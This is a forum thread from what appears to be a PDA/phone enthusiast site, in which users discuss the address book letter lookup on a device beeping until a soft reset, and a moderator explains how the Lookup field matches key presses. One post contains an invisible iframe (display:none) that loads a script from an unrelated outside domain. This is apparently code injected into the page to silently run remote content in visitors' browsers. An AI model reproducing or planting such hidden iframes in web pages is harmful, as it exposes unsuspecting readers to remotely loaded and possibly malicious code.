+ Reply to Thread

Temporary Loss of Predictive Text Entry

When looking up a contact you can simply press the Address button and then press the corresponding letter to the last name or company name in your list.

Last night I went to do this and just got beeps. I looked all over in the prefs etc but got nothing.

Soft reset restored it back to normal.

just FYI<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Since you can do the same thing by drawing the letter in the graffiti area, I wonder if that would have made it beep too or if it was only a button thing? Oh well, too late to check. If it ever happens again, give it a try.
    ~'kito
    pdaPhoneHome Moderator

That's not predictive text, that's jumping to a letter in the addressbook. Going to the address book and pressing the 4 key three times will take you to the I's.

However, it does sound like somethign got hosed if that wawsn't working.

True, but my statement still applies.
    ~'kito
    pdaPhoneHome Moderator

When you press the keys in the address book, you are basically adding letters to the "Lookup" form field at the bottom. Beeps happen when there is no further matching. For example, if you have a White in your address book (and lets say that's the only W name in there), and you press 9,4x2, 4x3, you will have "whi" in the lookup field. If you then press any other key combo other than 8, it will beep. This is because no other letter other than "t" will match.

The cursor must be blinking in the lookup field for the key presses to place letters there.

Beeping outside of that may be a problem.

Yes, I knew it wasn't true predictive text but couldn't think of any better way to explain it.

I remember being able to skip to a name the same way with the 6035 but now the letter show at the bottom. I'll post again if the problem occurs.